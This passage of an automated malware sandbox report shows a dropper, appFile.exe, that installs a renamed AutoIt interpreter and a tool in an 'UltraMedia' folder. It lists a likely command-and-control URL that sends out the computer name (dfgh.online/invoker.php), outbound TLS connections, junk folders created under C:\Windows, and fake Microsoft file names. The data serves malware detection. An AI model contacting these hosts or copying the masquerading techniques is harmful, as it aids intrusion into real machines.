      Source: appFile.exeString found in binary or memory: http://crl.micn
      Source: appFile.exeString found in binary or memory: http://crl.micros
      Source: appFile.exeString found in binary or memory: http://crl.microsof
      Source: appFile.exeString found in binary or memory: http://crl.microsoft.coX
      Source: appFile.exeString found in binary or memory: http://crl.microsy
      Source: appFile.exeString found in binary or memory: http://crl.microsyFailed
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
      Source: vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
      Source: appFile.exeString found in binary or memory: http://localhost/data.svc
      Source: appFile.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: appFile.exe, Ted.com.1.dr, Serious.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: appFile.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
      Source: appFile.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
      Source: appFile.exeString found in binary or memory: http://ocsp.globalsign.com/rootr103
      Source: appFile.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://ocsp.sectigo.com0
      Source: Ted.com.1.dr, Serious.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Ted.com.1.dr, Serious.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: appFile.exe, Ted.com.1.dr, Serious.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: powershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: appFile.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/http
      Source: powershell.exe, 00000010.00000002.2150012095.0000000004D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: appFile.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
      Source: Ted.com.1.dr, Serious.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: appFile.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
      Source: appFile.exe, Ted.com.1.dr, Serious.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: appFile.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://subca.ocsp-certum.com01
      Source: appFile.exeString found in binary or memory: http://tempuri.org/
      Source: powershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Ted.com, 0000000B.00000000.1730188123.0000000000705000.00000002.00000001.01000000.00000007.sdmp, Ted.com.1.dr, Remarkable.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://www.certum.pl/CPS0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.faststone.org/
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.faststone.org/FSCTutorial.htm
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.faststone.org/FSCTutorial.htmU
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.faststone.org/U
      Source: appFile.exeString found in binary or memory: http://www.microsoft.
      Source: appFile.exeString found in binary or memory: http://www.microsoft.A
      Source: appFile.exeString found in binary or memory: http://www.microsoft.co
      Source: appFile.exeString found in binary or memory: http://www.ws-i.org/Profiles/BasicProfile-1.1.html
      Source: powershell.exe, 00000010.00000002.2150012095.0000000004D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
      Source: powershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000010.00000002.2150012095.00000000050D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
      Source: powershell.exe, 00000010.00000002.2149016419.0000000002D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
      Source: powershell.exe, 00000010.00000002.2150012095.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
      Source: powershell.exe, 00000010.00000002.2149643028.0000000003090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
      Source: powershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000010.00000002.2150012095.0000000005122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: appFile.exeString found in binary or memory: https://go.microsRSION_INFO
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: https://jrsoftware.org/
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000000.2354264175.0000000000C61000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: https://jrsoftware.org0
      Source: powershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: https://sectigo.com/CPS0D
      Source: Ted.com.1.dr, Serious.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: https://www.certum.pl/CPS0
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.faststone.org/order.htm
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.faststone.org/order.htmU
      Source: Serious.8.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2357659279.00000000033FF000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2360775328.000000007F04B000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000000.2363259351.0000000000C01000.00000020.00000001.01000000.0000000B.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000000.2382444621.0000000000E6D000.00000020.00000001.01000000.0000000D.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.dr, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drString found in binary or memory: https://www.innosetup.com/
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2357659279.00000000033FF000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2360775328.000000007F04B000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000000.2363259351.0000000000C01000.00000020.00000001.01000000.0000000B.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000000.2382444621.0000000000E6D000.00000020.00000001.01000000.0000000D.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.dr, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drString found in binary or memory: https://www.remobjects.com/ps
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_00BE51EB NtQuerySystemInformation,49_2_00BE51EB
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\appFile.exeFile created: C:\Windows\ExceptLiteracyJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeFile created: C:\Windows\CalibrationMomsJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeFile created: C:\Windows\KnowledgeEventsJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeFile created: C:\Windows\HudsonPlacesJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeFile created: C:\Windows\TowersEcoJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeFile created: C:\Windows\BlvdDevelopmentsJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_004049A80_2_004049A8
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_00BE383849_2_00BE3838
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\723356\Ted.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\appFile.exeCode function: String function: 004062CF appears 58 times
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drStatic PE information: Number of sections : 11 > 10
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.drStatic PE information: Number of sections : 11 > 10
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.exe.11.drStatic PE information: Number of sections : 11 > 10
      Source: appFile.exeBinary or memory string: OriginalFilenameshtransform.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdasc.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameJavaScriptCollectionAgent.dllD vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSyncRes.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMSSIP32 Forwarder DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemscxpl32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMSHWGST.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameapisetstubj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewsnmp32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilename vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameWOWEXEC.EXE9)ProductNameMicrosoft vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameiismui\ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdaer.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemicaut.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameUserDataAccessRes.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsxactps.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameQEdWipes.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameRemoveDeviceElevated.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdaremr.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameipmiprr.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameimagesp1.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameASFErr.Dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsvidc32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilename vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameiologmsg.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Windows.Presentation.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameneth.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewshelper.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdadc.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdaorar.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsaddsr.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameodtext32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIR50_QC.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdap: vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamesecurity.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsd vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data.Services.Client.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameWMError.Dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameDummy.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameaspnet_regbrows vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemscpx32r.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemicrosoft.visualbasic.compatibility.resources.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsader15.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data.Data vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemfAACEnc.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSensorsCpl.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameDummy.dl[ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameWalletproxy.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamehttpai.dllj% vs appFile.exe
